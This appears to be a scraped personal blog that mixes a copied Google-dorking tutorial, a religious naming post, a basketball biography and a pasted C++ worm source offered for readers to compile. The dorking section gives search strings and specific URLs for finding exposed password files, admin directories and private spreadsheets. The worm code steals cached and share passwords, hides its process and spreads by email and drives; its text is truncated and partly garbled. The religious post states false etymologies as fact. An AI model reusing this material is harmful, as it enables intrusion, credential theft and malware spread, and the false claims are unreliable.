CATCH ME IF U CAN

CATCH U PEOPLE LATER OK AFTER MY TEST >...................... IM GET ASS KICK IN JULY 3rd
exam in SQL data base an connecting SQL with visual basic..............hehe that realy interesting........& little sleepy tooo................luckly nor thory paper this time...............///

Google: A Hacker's Best Friend

In the last few years a number of news articles appeared that warned of the fact that hackers (or
crackers if you will) make use of the google search engine to gain access to files they shouldn't be
allowed to see or have access to. This knowledge is nothing new to some people but personally I have
always wondered how exactly a thing like this works. VNUnet’s James Middleton wrote an article in
2001 talking about hackers using a special search string on google to find sensitive banking data:
"One such posting on a security newsgroup claimed that searching using the string 'Index of /
+banques +filetype:xls' eventually turned up sensitive Excel spreadsheets from French banks. The
same technique could also be used to find password files"[1]
Another article that appeared on wired.com told us how Adrian Lamo, a hacker who made the news
often the last couple of years, explained that google could be used to gain access to websites of big
corporations.
“For example, typing the phrase "Select a database to view" -- a common phrase in the FileMaker Pro
database interface -- into Google recently yielded about 200 links, almost all of which led to FileMaker
databases accessible online.”[2]
These articles kept on coming up in the online news. U.S. Military and Government websites were
vulnerable because admin scripts could be found using google, medical files, personal records,
everything suddenly seemed just one google search away. But these articles seemed to show up once
every half year and always talked about it as if it was something new. Another thing was, the articles
never explained how one would actually go about doing this. Almost never an example of a search
string was given. The last time I read one of these articles I decided it was time to find out for myself,
whether google actually could do all they say it can. The following is a report of my findings and a
description of some techniques and search strings one could use.
Theory
The theory behind this is actually quite simple. Either you think of certain data you would like to
acquire and try and imagine in what files this kind of data could be stored and you search for these
files directly. (Search for *.xls files for example) Or you take the more interesting approach and you try
to think of a certain software that allows you to perform certain tasks or to access certain things and
you search for critical files of this software. An example could be a content management system. You
read up on this particular content management system, check out of what files it exists and search for
those. A great example is that of the databases mentioned above, where you know the string “view
database” is used on pages that shouldn’t be accessible to you and you then search for pages
containing that string, or you check the software and notice that the option to view a database is linked
on a webpage within this software called “viewdbase.htm” and you search for “viewdbase.htm”
The most important thing is to have a clear goal, to know what it is you want to find. Then search for
these specific files or trademarks that these files have.
Google Search Options
Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Google allows you to search for specific file types, so instead of getting html-files as a result (websites)
you get Microsoft excel files for example. The search string you would use would be this:
Filetype:xls (for excel files) or filetype:doc for word files.
But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way
doesn’t tell you you can search for *.db and *mdb files. I wonder what other file types one can search
for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of
something that might get you some interesting results.
Inurl
Another useful search option is the inurl: option which allows one to search for a certain word one
would want to be in the url. This gives you the opportunity to search for specific directories/folders,
especially in combination with the “index of” option, about which I will talk later on.
An example would be inurl:admin which would give you results of website urls that have the word
“admin” in the url.
Index of
The index of option is another option that isn’t especially thought of by the creators of google, but
comes in very handy. If you use the “index of” string you will find directory listings of specific folders on
servers. An example could be:
‘index of” admin or index.of.admin
which would get you many directory listings of admin folders. (don’t forget to use the quotes in this
case since you are looking for the entire “index of” string, not just for “index” and “of”)
Site
The site option allows you to come up with results that only belong to a certain domain name
extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites,
but also for results from just one site, but more interesting might be to search for specific military or
government websites. An example of a search string would be:
Site:mil or site:gov
Site:neworder.box.sk “board”
Intitle
Intitle is another nice option. It allows you to search for html files that have a certain word or words in
the title. The format would be intitle:wordhere. You could check out what words appear in the title of
some online control panel or content management system and then search google for this word with
the intitle option, to find these control panel pages.
Link
The Link option allows you to check which sites link to a specific site. As described in Hacking
Exposed Third Edition, this could be useful:
These search engines provide a handy facility that allows you to search for all sites that have links
back to the target organization’s domain. This may not seem significant at first but let’s explore the
implications. Suppose someone in an organization decides to put up a rogue website at home or on
the target network’s site.“”[4]
Combining search options
The above mentioned search options might or might not be known to you, but even though they can
amount to some interesting results, it’s a fact that when you start combining them, that’s when
google’s magic starts to show. For example, one could try this search string:
inurl:nasa.gov filetype:xls "restricted" or this one: site:mil filetype:xls "password" or maybe
site:mil “index of” admin
(I’m just producing these from the top of my head, I don’t know whether they’d result in anything
interesting, that’s where you come in. You got to find a search string that gets the results you want.)
Examples; The Good Stuff
Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
To start out simple, you can try and search directly for files that you believe might hold interesting
information. The obvious choices for me were things like:
Password, passwords, pwd, account, accounts, userid, uid, login, logins, secret, secrets, all followed
by either *.doc or *.xls or *.db
This led me to quite some interesting results, especially with the *.db option but I actually also found
some passwords.doc files, containing working passwords.

http://www.doc.state.ok.us/Spreadsheets/private%20prison%20survey%20for%20web.xls
http://www.bmo.com/investorrelations/current/current/suppnew/private.xls
http://www.nescaum.org/Greenhouse/Private/Participant_List.xls
http://www.dscr.dla.mil/aviationinvest/attendance_5Apr01.xls
http://web.nps.navy.mil/~drdolk/is3301/PART_IS3301.XLS

enjoy it.........

SOME THINGS THAT U MUST NOT SAY

All of the Muslims out they who read my blog there are unknownly things that u say are ,not supposed to say "mosque" instead say "masjid". I have found that the meaning of "mosque" means "mosquitos" and plez dont write "mecca" it means "house of wines" so plez write correclty as "Makkah" and dont write the name of our prophet(slw) name in short form as "Mohd" it means "the dog with big mouth" so write it completely as "Mohamed". I hope all of the peoples will watch ur mouth.......heheh...

E-directory

Jaa have build a e-directory program for a pocket pc's this very good work nd i only want is the e-directory so there is this ..............this was a comment on my blog that diabolicaldevil posted...i want see this to others tooooooooo........................ NO OFFANCE any specially dhiraagu peoples.......

d0wnload it and work it out.....

http://jaa.technova.com.mv/uploads/Pocket110-1.0b2-PPC.cab

its a phone directory for pocket pc's
if u wanna search for the house name
jus extract the .cab file using winrar and open the DIRECT~1.001 file in wordpad

THERE IS A WALL PAPER OF A IVERSON

Allen Iverson biography

Since im a basketball player.... i know from 2003 and he a done the best cross overs ever in the NBA..........read rest below............

It was 1975 and Ann Iverson was 15 years old, unmarried and newly arrived with her family from Connecticut when she gave birth in Hampton to her first child. Allen Iverson was nicknamed Bubbachuck, a combination of two uncles’ names. Iverson said his biological father rarely was in the picture during his childhood. "You know, he called me a little bit this year (1996)," Iverson said. "But, I mean, he can’t take the place of Michael Freeman. Nobody ever will. That’s who I feel is my father. "Freeman said he was 18 and Bubbachuck just a few months old when he and Ann Iverson began living together in 1975. Freeman said he later became a welder for the Newport News Shipbuilding and Dry Dock Co., and the father of Allen’s sisters, Brandy and Iiesha. Ann Iverson held various jobs after graduating from high school - one on an assembly line at Avon Fashions, a clothes packaging and distribution factory where she worked from 4 p.m. to 4 a.m. At times she was unemployed. But Allen Iverson said he never has forgotten his mother’s efforts. "She took care of me for 20 years," he said. "I want to just do the same thing for her. "Freeman said he and Ann Iverson began living apart when Allen was in junior high school. Freeman said he helped support the family until he lost his job after a car accident. "Then things got tough," he said. "There were times when Allen never knew where his next meal was going to be," said Mike Bailey, Iverson’s basketball coach at Bethel High. "Here’s a kid who couldn’t take a bath because he had no running water because it had been turned off. Sometimes you had to go to five, six different places to find him," Bailey said. "You couldn’t phone some places because there were no phones. "My mom struggled. My dad struggled. Everybody in my family struggled," Iverson said recently. "It was nothing new, the lights being cut off or anything. I mean, it was something I had been dealing with my whole life. "Unemployed, Freeman said he "went the wrong way. I did what I had to do" to support the family. "And some things, you know, I had to go against the law to do. "In February 1991, midway through Iverson’s ninth grade year, Freeman was convicted in Newport News, Va., of possession of cocaine with intent to distribute and given a 10 year prison sentence with five years suspended. "When I left my son to go to prison I told him he’s got to hold down the fort until I got home," Freeman said. Iverson was 15. "I said, basketball is your family’s way out. "Freeman was paroled in December 1992. But he was arrested in Hampton in March 1994 on charges of possession of cocaine with intent to distribute and possession of a firearm. He was indicted for possession of cocaine; he pleaded guilty and was given a suspended sentence. In November 1994, the suspended sentence he received in 1991 was revoked and he was returned to prison. Freeman was paroled again in January. "I feel all the jail time he did was for us," Iverson said. "He couldn’t stand to look at us living like that. So he went out and did what he had to do."

High school While Iverson was leading Bethel to state football and basketball titles during his junior year, his coaches became increasingly concerned about the company and late night hours he was keeping. One night in January 1993, Iverson was at a party in a hotel where a man was shot to death. On Valentine’s Day in 1993, Iverson and friends involved in a gang fight at a Hampton, Virginia, Bowling Alley. Iverson’s crowd was loud and had to be asked to quiet down several times, and eventually something of a shouting duel began with another group of youths. A huge fight erupted, pitting the local white kids against the blacks. It started as an argument between Iverson and a white youth. Iverson insists he left when trouble started. Another witness claimed to have seen him hit a white woman in the head with a chair. Iverson was tried as an adult, and the trial became a media circus. Iverson and three blacks were the only ones arrested and his celebrity bore on the case. Iverson was convicted of maiming by mob, and sentenced to five years in prison. Ann Iverson, meanwhile, began optimistically mapping out her 18-year-old son’s future. On Oct. 10, 1993 she visited Allen in prison, where he signed an affidavit giving her power of attorney. "My name is Allen Iverson," the affidavit read. "I am in need for my mother to conduct any and all of my affairs and make any and all decisions for me . "One of Ann Iverson’s decisions was to visit Thompson in early December 1993. "She was the reason why I helped her child," Thompson said. Several weeks later, Virginia’s governor at the time, L. Douglas Wilder, granted conditional clemency to Iverson, citing sufficient doubt about his guilt. Iverson was free after four months at the City Farm. In spring 1994, Thompson visited Iverson at Hampton’s Richard M. Milburn High, which caters to students who have dropped out of school or are at risk of doing so. "I never discussed that bowling alley incident:, never asked him, What really happened?’ " Thompson said. "I told him I did not want to talk about whether the judge was fair or not."


College At Georgetown, Iverson majored in fine arts. Iverson said he has an interest in drawing, and friends say he is an outstanding caricaturist. "I want to continue to draw," Iverson said. "Every talent God gave me, I want to use it. I can’t play basketball forever. "But his primary mission at Georgetown seemed to be improving his basketball skills. Recalling his first day on campus, Iverson said, "Alonzo Mourning an NBA star and ex-Hoya was in the gym talking to Coach Thompson. I mean, I was excited even before I got to Georgetown. But once I got there I was even more excited. All I wanted to do was play basketball. "During his two seasons with the Hoyas, Iverson averaged 23 points a game and twice was named Big East Conference defensive player of the year. From his first game, the 6 foot, 165 pound Iverson was an electrifying presence on the court. He had astonishing speed while dribbling and explosive jumping ability. Thompson allowed and sometimes even asked Iverson to dominate games as few Georgetown guards have. Some Thompson watchers were surprised by the offensive freedom he gave Iverson. "You teach according to the student," Thompson explained. "Allen had talent - exceptional talent. So he was permitted to have more leeway. You don’t crush creativity. "Deciding to Leave Evidently, Iverson also had a knack for blocking out distractions, which seemed to be everywhere. At some games, he was taunted by opposing fans who yelled "jailbird, jailbird" or waved bowling pins in the air. In the midst of his freshman season, Ann Iverson used her power of attorney to file suit - in Allen’s name - against the lawyer who had defended him free of charge in the bowling alley case, Herbert V. Kelley Sr. The lawsuit alleged that Kelley had been negligent and that Iverson would suffer "mortification, shame, vilification and financial loss" because of the guilty verdict. The complaint sought $100 million in damages. Then there was Freeman’s incarceration. While Iverson was settling into his comfortable dormitory suite at Copley Hall to begin his sophomore year last fall, his "dad" was living just a few miles a way at the Fairfax County Correctional Field Unit, one of several state facilities in which he was housed. Iverson said he didn’t visit Freeman in Fairfax because "I’d visited him in another prison and it just hurt me so much. I’d given him the tennis shoes off my feet because the sneakers he had, they were so bad, all messed up. So I went home barefooted that day. "As the season progressed, and reporters began wondering if Bubbachuck would become the first Georgetown player to enter the NBA draft before his senior year, Thompson became increasingly aware of the hardships in Iverson’s life. In early April, shortly after the Hoyas were eliminated from the NCAA tournament, Thompson invited Iverson and his mother to a meeting at McDonough. The subject should Iverson leave school to turn pro? Two of Thompson’s most trusted confidants - Falk, his Washington based agent, and Mary Fenlon, his long-time aide decamp, also were invited.Falk has provided free counsel to Thompson’s athletes for more than 15 years and has represented virtually every Hoya who has played in the NBA, including Mourning, Patrick Ewing and Dikembe Mutombo. "John makes no bones of the fact he recommends us to his players," said Falk, who also represents Michael Jordan, Iverson’s childhood hero. Falk said he "very, very aggressively" advised Iverson to stay in school because he could earn more money, particularly from endorsement contracts, after another year of TV exposure. But in that meeting and in another in his office on upper Wisconsin Avenue, Falk said he heard some compelling reasons why Iverson should turn pro. "Allen told me his mother’s living conditions were deplorable," Falk said. "There was a sewage problem in her house. Sewage was seeping through the floor and Allen said there was a stench that was just unimaginable. "The condition of younger sister Iiesha also had worsened; she had just suffered another seizure. "His sister needed a brain specialist," Falk said. Meanwhile, Freeman had been paroled and was unemployed. "Allen didn’t feel that staying in school was a viable option," Falk said. Thompson said outside influences also were competing for Iverson’s attention this spring. Agents were on the prowl, and "you had people running around trying to get him involved in rapping," Thompson said. Iverson had spent some evenings in a studio, recording a rap song, which he played for teammates. Thompson said he told Iverson, "You are a basketball player. You’re not going to make your living rapping. "As for the agents, Falk was the odds-on favorite to represent Iverson. Shortly after Georgetown’s season ended, Falk arranged for Iverson to have a private phone conversation with his childhood hero. "Michael told me he had heard a lot of good things about me," Iverson said, "and he said he was going to have to tighten up his game for me. Which was definitely a joke. I just laughed. But everything he said to me made me feel good. "On April 30, Iverson signed a contract with Falk. The next afternoon, with his mother, Thompson and Falk by his side, Iverson announced he was turning pro. A Georgetown official said Iverson withdrew from the university the same day. With two months to go before the draft, Iverson asked a bank for a line of credit, which was granted on the basis of his seven figure earning potential. Iverson then hired a specialist for Iiesha and discussed with Falk the possibility of moving his entire family to the NBA city where he soon will reside.

Localhost

To day i was wondering about the localhost that i see in the php webserver.sss and i was when to ..... start-run-cmd- the command was Ping localhost
Pinging geek-f69dd6592 [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" sent =" 4," received =" 4," lost =" 0" minimum =" 0ms," maximum =" 0ms," average =" 0ms" href="http://www.totalillusions.net/forum/index.php?showtopic=328">http://www.totalillusions.net/forum/index.php?showtopic=328

WORM.CPP

//I came across a cool c++ code i also have done changers to this code so try to compile it see what happen ............

// An exploration into remote network propogation using multiple techniques.

// The w0rm will spread via e-mail (MAPI) all local drives and any writable

// network shares. It collects passwords on the local system to be used in

// cracking any password protected shares on the network. It will write an

// Autorun.inf file in the root of any drives it can so when you open that

// drive, e.g. double click it the w0rm will execute and go resident :).

// This code is obviously buggy and not intended to be actually used in the

// 'real' world. To determine if the payload should be deployed the w0rm

// sits on the network and plays a 'game' with other w0rms on that network

// segment via broadcast UDP messages. see relevant source for a proper

// idea of the 'game', its just a perverse example of too much time on ones

// hands :). this is version 1.00 so the are bugs, incompatabilities with

// various flavors of windows and other anomolies - dose! but if you want

// something better write it yourself ;) (and send me a copy)

//--header-files--------------------------------------------------------------//

#include

#include

#include

#include

#include

#include

//--defines-------------------------------------------------------------------//

#define MAX_LENGTH 128

#define MAX_RECIEVERS 50

#define MUTEX_NAME "w0rm"

#define EARTH_WORM_JIM "Readme.exe"

#define WORMGAME_PORT 12345

#define WORMGAME_MAX_WINS 10

#define WORMGAME_PKT_PLAY 0xFF

#define WORMGAME_PKT_WIN 0x80

//--globals-------------------------------------------------------------------//

char *ptrEgo, *buf;

char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];

int index = 0;

typedef struct tagPASSWORD_CACHE_ENTRY {

WORD cbEntry;

WORD cbResource;

WORD cbPassword;

BYTE iEntry;

BYTE nType;

BYTE abResource[1];

} PASSWORD_CACHE_ENTRY;

typedef struct WormGamePkt {

BYTE pktType;

int pktNum;

} AWORMGAMEPACKET;

//--function-declarations-----------------------------------------------------//

DWORD WINAPI WormGameThread( LPVOID );

DWORD WINAPI WormMainThread( LPVOID );

BOOL runningNT();

void propogateMAPI( void );

int initMAPI( void );

int validAddress( char * addr );

int sendMessage( int recipNum, LHANDLE lhSession );

int getSharePasswords( void );

int getCachedPasswords( void );

int addPassword( char * pwd );

void propogateDrive( void );

void attackDrive( char * drive, int type );

void propogateNet( LPNETRESOURCE lpnr );

int crackNetShare( char * share );

void releasePayload();

extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );

//--entry-point---------------------------------------------------------------//

// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)

int main( int argc, char **argv )

{

HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;

DWORD WormGameThreadId, WormMainThreadId;

// display explorer window if we need to, due to autorun.inf file :)

// test for any command line...

/* only allow one instance of worm to run on system at one time */

hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);

if( GetLastError() == ERROR_ALREADY_EXISTS )

{

ExitProcess( 0 );

}

ptrEgo = argv[0];

/* try to 'hide' the process */

if( runningNT() == TRUE )

{

// hide process in winNT

printf("WORM running on WinNT\n");

} else {

printf("WORM running on Win9x\n");

LoadLibrary( "KERNAL32.DLL" );

RegisterServiceProcess( NULL, 1);

}

/* go resident and give worm RAW power */

hEgo = GetCurrentProcess();

SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

// create suspended WormMainThread...

hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);

if( hWormMainThread != NULL )

{

// set thread to time critical... 'i wana take you higher' - sly and the family stone

//SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);

// resume thread execution...

ResumeThread( hWormMainThread );

}

/*

// create suspended WormGameThread...

hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);

if( hWormGameThread != NULL )

{

// resume thread execution...

ResumeThread( hWormGameThread );

}

*/

/* wait for hWormGameThread() to terminate */

// WaitForSingleObject( hWormGameThread, INFINITE);

WaitForSingleObject( hWormMainThread, INFINITE);

printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");

getch();

/* release our mutex, next local worm wont get blocked */

if( hMutex != NULL )

{

ReleaseMutex( hMutex );

}

return 0;

}

//----------------------------------------------------------------------------//

DWORD WINAPI WormMainThread( LPVOID )

{

DWORD dwSize;

char buff[64];

printf("WormMainThread: started...\n");

/* spread worm via MAPI */

propogateMAPI();

/* get any passwords we can for use later on */

getSharePasswords();

getCachedPasswords();

dwSize = 64;

WNetGetUser( NULL, buff, &dwSize );

addPassword( buff );

printf("DEBUG: total pwds got = %d\n", index);

/* spread worm via any/all localy maped drives */

propogateDrive();

/* spread worm via any/all LAN network shares */

propogateNet( NULL );

/* finished our little game :) */

ExitThread( 0 );

return 0;

}

//----------------------------------------------------------------------------//

DWORD WINAPI WormGameThread( LPVOID )

{

WSADATA w;

SOCKET s_recv, s_send;

sockaddr_in saddr, saddr_in, saddr_out;

int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;

AWORMGAMEPACKET gamePkt;

fd_set fd_read;

struct timeval timeout = { 5, 0 };

if( WSAStartup( MAKEWORD(1,0), &w) != 0 )

{

printf("WormThread: WSAStartup failed\n");

goto endThread;

}

s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);

s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);

if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )

{

printf("WormThread: invalid socket\n");

goto endThread;

}

memset( &saddr_in, 0x00, sizeof( struct sockaddr));

memset( &saddr, 0x00, sizeof( struct sockaddr));

saddr.sin_family = AF_INET;

saddr.sin_port = htons( WORMGAME_PORT );

saddr.sin_addr.s_addr = INADDR_ANY;

memset( &saddr_out, 0x00, sizeof( struct sockaddr) );

saddr_out.sin_family = AF_INET;

saddr_out.sin_port = htons( WORMGAME_PORT );

saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

optval = 1;

if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )

{

printf("WormThread: setsocketopt failed\n");

goto endThread;

}

if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )

{

printf("WormThread: bind failed\n");

goto endThread;

}

FD_ZERO( &fd_read );

FD_SET( s_recv, &fd_read );

randomize();

loop:

while( 1 )

{

if( totalwins >= WORMGAME_MAX_WINS )

{

releasePayload();

totalwins = 0;

}

// pick a magic number...

magicWorm = ( ( rand() % 100 ) + 1 );

printf("WormThread: picked a magic num: %d\n", magicWorm);

// wait a length of time...

Sleep( 500 );

// send my magic number...

gamePkt.pktType = WORMGAME_PKT_PLAY;

gamePkt.pktNum = magicWorm;

if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )

{

printf("WormThread: sendto failed\n");

break;

}

// handel responces...

while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )

{

if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )

{

printf("WormThread: recvfrom failed\n");

break;

} else {

switch( gamePkt.pktType )

{

case WORMGAME_PKT_PLAY: // recieved a magic number...

// ignore responce from local machine...

printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);

// process other responces

if( gamePkt.pktNum == magicWorm )

{

// notify any winners

gamePkt.pktType = WORMGAME_PKT_WIN;

saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;

sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);

saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

}

break;

case WORMGAME_PKT_WIN: // im a winner :)

printf("WormThread: IM A WINNER!!!\n");

totalwins++;

goto loop;

default: // its all gone bugfuck!

printf("WormThread: its all gone bugfuck!\n");

break;

}

}

} // while(select...

}

endThread:

closesocket( s_recv );

closesocket( s_send );

ExitThread( 0 );

return 0;

}

//----------------------------------------------------------------------------//

BOOL runningNT()

{

OSVERSIONINFO osvi;

BOOL retval = FALSE;

osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

GetVersionEx(&osvi);

switch( osvi.dwPlatformId )

{

case VER_PLATFORM_WIN32_NT:

retval = TRUE;

break;

case VER_PLATFORM_WIN32_WINDOWS:

retval = FALSE;

break;

default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE

retval = FALSE;

break;

}

return retval;

}

//----------------------------------------------------------------------------//

void propogateMAPI( void )

{

LHANDLE lhSession;

CHAR rgchMsgID[513];

MapiMessage *lpMessage;

int i=0;

if( initMAPI() != 0 )

{

return;

}

if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)

{

*rgchMsgID = NULL;

while( i <>

{

if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)

{

break;

}

if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)

{

// printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);

if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )

{

strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);

i++;

}

if( validAddress( lpMessage->lpRecips->lpszAddress ) == 0 )

{

strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);

i++;

}

}

}

MAPIFreeBuffer( lpMessage );

// TO DO: sort addressList and remove duplicates...

//sendMessage( i, lhSession ); // <---- !!!!!!

MAPILogoff( lhSession, 0L, 0L, 0L);

}

for( int x = 0 ; x <>

{

printf("DEBUG: attacking:\t%s\n", addressList[x]);

}

return;

}

//----------------------------------------------------------------------------//

int initMAPI( void )

{

HINSTANCE hi;

LPMAPILOGON MAPILogon;

LPMAPIFINDNEXT MAPIFindNext;

LPMAPIREADMAIL MAPIReadMail;

LPMAPISENDMAIL MAPISendMail;

hi = LoadLibrary( "mapi32.dll" );

if( hi == NULL )

{

return -1;

}

MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");

MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");

MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");

MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");

if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )

{

return -1;

}

return 0;

}

//----------------------------------------------------------------------------//

int validAddress( char * addr )

{

if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)

{

return -1;

} else if( strchr( addr , '@') == NULL )

{

return -1;

} else if( strchr( addr , '.') == NULL )

{

return -1;

} else {

return 0;

}

}

//----------------------------------------------------------------------------//

int sendMessage( int recipNum, LHANDLE lhSession )

{

MapiRecipDesc *recips = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );

MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};

for( int i=0 ; i

{

recips[i].ulReserved = 0;

recips[i].ulRecipClass = MAPI_TO;

recips[i].lpszName = addressList[i];

recips[i].lpszAddress = addressList[i];

recips[i].ulEIDSize = 0;

recips[i].lpEntryID = NULL;

}

MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};

if( MAPISendMail( lhSession, 0L, ¬e, 0L, 0L) != SUCCESS_SUCCESS )

{

return -1;

}

free( recips );

return 0;

}

//----------------------------------------------------------------------------//

int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)

{

memmove(buf, x->abResource+x->cbResource, x->cbPassword);

buf[x->cbPassword] = 0;

addPassword( buf );

return 0;

}

//----------------------------------------------------------------------------//

int getCachedPasswords( void )

{

buf = new char[1024];

HINSTANCE hi = LoadLibrary("mpr.dll");

if( hi == NULL )

{

return -1;

}

WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");

if( enp == NULL )

{

return -1;

}

enp( 0, 0, 0xff, pce, 0);

FreeLibrary( hi );

return 0;

}

//----------------------------------------------------------------------------//

BYTE rotr( BYTE b )

{

BYTE carry;

carry = b & 0x01;

carry <<= 7;

b >>= 1;

b |= carry;

return b;

}

//----------------------------------------------------------------------------//

void decodePW( char * pw )

{

BYTE hash = 0x35;

while( pw && *pw )

{

*pw = *pw ^ hash;

pw++;

hash = rotr( hash );

}

}

//----------------------------------------------------------------------------//

int addPassword( char * pwd )

{

if( (strlen(pwd) > 0) && (strlen(pwd) <>

{

strcpy( passwordList[ index ], pwd);

printf("DEBUG: ADDED: %s\n", passwordList[ index ]);

index++;

}

return 0;

}

//----------------------------------------------------------------------------//

int getSharePasswords( void ){

if( runningNT() == FALSE )

{

HKEY key, subkey;

DWORD i, maxKeys, len, junk;

char keyName[256], wrightPwd[256], readPwd[256];

RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);

RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);

if( maxKeys != 0 )

{

for( i=0; i

{

RegEnumKey(key, i, keyName, 256);

RegOpenKeyEx(key, keyName, 0, NULL, &subkey);

wrightPwd[0] = readPwd[0] = 0;

len = 256;

RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);

wrightPwd[len] = 0;

decodePW(wrightPwd);

addPassword( wrightPwd );

len = 256;

RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);

readPwd[len] = 0;

decodePW(readPwd);

addPassword( readPwd );

}

}

RegCloseKey(subkey);

RegCloseKey(key);

}

return 0;

}

//----------------------------------------------------------------------------//

void propogateDrive( void )

{

int length;

char buff[MAX_LENGTH], *ptr;

ptr = buff;

length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

if( length > 0 && length <>

{

for( int i=0 ; i<=(length/4) ; i++ )

{

switch( GetDriveType( ptr ) )

{

case DRIVE_FIXED:

// The drive is a local drive.

printf("DRIVE_FIXED: %s\n", ptr);

attackDrive( ptr, 1 );

break;

case DRIVE_REMOTE:

// The drive is a network drive.

printf("DRIVE_REMOTE: %s\n", ptr);

attackDrive( ptr, 1 );

break;

default:

break;

}

*ptr+=1;

}

}

return;

}

//----------------------------------------------------------------------------//

void attackDrive( char * drive, int type )

{

FILE *fpAutorun;

char buff[MAX_LENGTH];

// copy worm to drive, Attribute = hidden

if( type == 1 )

{

sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);

} else {

sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);

}

printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);

/* if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )

{

// create an Autorun.inf file on drive, Attribute = hidden

sprintf( buff, "%sAutorun.inf", drive);

fpAutorun = fopen(buff, "w");

if( fpAutorun != NULL )

{

fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);

fclose( fpAutorun );

_rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);

}

} */

return;

}

//----------------------------------------------------------------------------//

void propogateNet( LPNETRESOURCE lpnr )

{

DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;

HANDLE hEnum;

LPNETRESOURCE lpnrLocal;

dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);

if( dwResult != NO_ERROR )

{

return;

}

do

{

lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);

dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);

if ( dwResultEnum == NO_ERROR )

{

for( DWORD i = 0; i <>

{

